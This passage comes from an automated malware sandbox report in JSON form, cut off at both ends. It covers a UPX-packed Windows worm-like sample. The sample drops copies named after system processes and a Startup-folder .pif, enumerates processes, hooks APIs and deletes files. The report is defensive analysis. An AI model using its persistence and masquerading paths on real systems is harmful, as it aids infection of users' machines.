\"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46889 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46784 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46857 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46884 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46784 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46885 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46913 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46882 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46900 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46788 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46683 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46901 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46923 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46890 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46795 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46882 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46823 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS .exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"New Folder.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Data HAPUBWS.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9CA14.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C477.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SMSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C852.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C855.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C479.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToLocalFileTime\" with parameter a7274968947bdb01 & a78f0dca9c7bdb01 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToLocalFileTime\" with parameter cb6c58c4947bdb01 & cbd41c269d7bdb01 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToLocalFileTime\" with parameter b67fb0c4947bdb01 & b6e774269d7bdb01 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToLocalFileTime\" with parameter 00f40ac5947bdb01 & 005ccf269d7bdb01 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FileTimeToLocalFileTime\" with parameter 7bd9f1c5947bdb01 & {A (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"WinExec@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32NextW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\share\\4K51K4\\New Folder.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\smss.exe\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\csrss.exe\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "15/22 Antivirus vendors marked dropped 